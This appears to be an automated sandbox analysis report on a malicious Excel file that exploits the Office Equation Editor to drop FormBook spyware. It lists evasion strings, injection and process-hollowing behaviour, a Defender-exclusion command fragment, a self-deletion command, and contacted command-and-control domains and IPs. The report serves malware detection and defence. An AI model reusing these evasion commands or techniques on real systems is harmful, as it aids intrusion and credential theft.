          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xles[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Processed APR12.xlsxStream path 'EncryptedPackage' entropy: 7.99992880466 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2684, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000001085E4 second address: 00000000001085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 000000000010896E second address: 0000000000108974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088A0 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2324Thread sleep time: -360000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2704Thread sleep time: -102329s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 920Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2404Thread sleep time: -35000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 1916Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 102329
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000006.00000002.2393233250.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2203299688.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.2203360504.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.2203299688.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000006.00000000.2185699010.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088A0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B10 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009326F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007B26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80
          Source: C:\Windows\explorer.exeDomain query: www.tricqr.com
          Source: C:\Windows\explorer.exeDomain query: www.ruhexuangou.com
          Source: C:\Windows\explorer.exeDomain query: www.vectoroutlines.com
          Source: C:\Windows\explorer.exeDomain query: www.centergolosinas.com
          Source: C:\Windows\explorer.exeDomain query: www.buylocalclub.info
          Source: C:\Windows\explorer.exeDomain query: www.aideliveryrobot.com
          Source: C:\Windows\explorer.exeDomain query: www.dreamcashbuyers.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.169.223.13 80
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.137.40 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.82.57.32 80
          Source: C:\Windows\explorer.exeDomain query: www.shopihy.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.126.105 80
          Source: C:\Windows\explorer.exeNetwork Connect: 18.236.1.157 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 5E0000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000006.00000000.2191136590.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2191136590.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.2393233250.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2191136590.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery321Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools11LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385456 Sample: Processed APR12.xlsx Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 39 www.zgcbw.net 2->39 55 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 11 other signatures 2->61 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 174 40 2->16         started        signatures3 process4 dnsIp5 47 3.125.17.227, 49167, 80 AMAZON-02US United States 11->47 33 C:\Users\user\AppData\Local\...\xles[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->79 18 vbc.exe 11->18         started        37 C:\Users\user\...\~$Processed APR12.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 49 Multi AV Scanner detection for dropped file 18->49 51 Tries to detect virtualization through RDTSC time measurements 18->51 53 Injects a PE file into a foreign processes 18->53 21 vbc.exe 18->21         started        process10 signatures11 63 Modifies the context of a thread in another process (thread injection) 21->63 65 Maps a DLL or memory area into another process 21->65 67 Sample uses process hollowing technique 21->67 69 Queues an APC in another process (thread injection) 21->69 24 explorer.exe 21->24 injected process12 dnsIp13 41 vectoroutlines.com 198.54.126.105, 49169, 80 NAMECHEAP-NETUS United States 24->41 43 www.ruhexuangou.com 23.82.57.32, 49170, 80 LEASEWEB-USA-SFO-12US United States 24->43 45 13 other IPs or domains 24->45 71 System process connects to network (likely due to code injection or exploit) 24->71 28 help.exe 24->28         started        signatures14 process15 signatures16 73 Modifies the context of a thread in another process (thread injection) 28->73 75 Maps a DLL or memory area into another process 28->75 77 Tries to detect virtualization through RDTSC time measurements 28->77 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Processed APR12.xlsx25%ReversingLabsDocument-Office.Exploit.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xles[1].exe16%MetadefenderBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xles[1].exe41%ReversingLabsByteCode-MSIL.Spyware.Noon
          C:\Users\Public\vbc.exe16%MetadefenderBrowse
          C:\Users\Public\vbc.exe41%ReversingLabsByteCode-MSIL.Spyware.Noon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://weather.gc.ca/astro/seeing_e.html)0%Avira URL Cloudsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          shopihy.com
          160.153.137.40
          truetrue
            unknown
            www.ruhexuangou.com
            23.82.57.32
            truetrue
              unknown
              centergolosinas.com
              192.169.223.13
              truetrue
                unknown
                sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.com
                18.236.1.157
                truefalse
                  high
                  www.aideliveryrobot.com
                  52.58.78.16
                  truetrue
                    unknown
                    vectoroutlines.com
                    198.54.126.105
                    truetrue
                      unknown
                      www.tricqr.com
                      unknown
                      unknowntrue
                        unknown
                        www.shopihy.com
                        unknown
                        unknowntrue
                          unknown
                          www.vectoroutlines.com
                          unknown
                          unknowntrue
                            unknown
                            www.zgcbw.net
                            unknown
                            unknowntrue
                              unknown
                              www.centergolosinas.com
                              unknown
                              unknowntrue
                                unknown
                                www.buylocalclub.info
                                unknown
                                unknowntrue
                                  unknown
                                  www.dreamcashbuyers.com
                                  unknown
                                  unknowntrue
                                    unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://search.ebay.de/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://www.mtv.com/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://www.rambler.ru/explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
